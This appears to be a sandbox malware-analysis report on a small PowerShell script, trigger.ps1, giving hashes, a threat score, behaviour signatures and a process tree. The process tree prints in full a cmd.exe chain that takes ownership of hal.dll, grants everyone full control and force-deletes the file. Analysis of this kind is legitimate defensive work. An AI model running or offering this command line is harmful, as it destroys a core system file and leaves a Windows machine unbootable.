Overview

overview

8

Static

static

1

trigger.ps1

windows7-x64

8

trigger.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    94s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/07/2024, 14:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    trigger.ps1

  • Size

    142B

  • MD5

    3981277c3f6d65f3351a8709ae9b1a6d

  • SHA1

    35f1475f69a389a1a2480f3ecef78a7a46c93083

  • SHA256

    4dd70bda2372eb7a20baca37320e246c2e6baf3ad622c558df3e70cb91bed8b2

  • SHA512

    a5babc6cda3817f7f74b40568672dd2fb25284bcd493d4bcbd25c621e9ffc71897f239b968fed0c5f526c2e40bc88ef7a62cdc9e7387942cbb172486935d3435

Score
8/10
discoveryexecutionexploit

Malware Config

Signatures

  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\hal.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3176
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2492
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4304

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uggc0qaw.yt4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2488-0-0x00007FF8ED4A3000-0x00007FF8ED4A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2488-10-0x000001B4EE730000-0x000001B4EE752000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2488-11-0x00007FF8ED4A0000-0x00007FF8EDF61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2488-12-0x00007FF8ED4A0000-0x00007FF8EDF61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2488-15-0x00007FF8ED4A0000-0x00007FF8EDF61000-memory.dmp

      Filesize

      10.8MB

      Download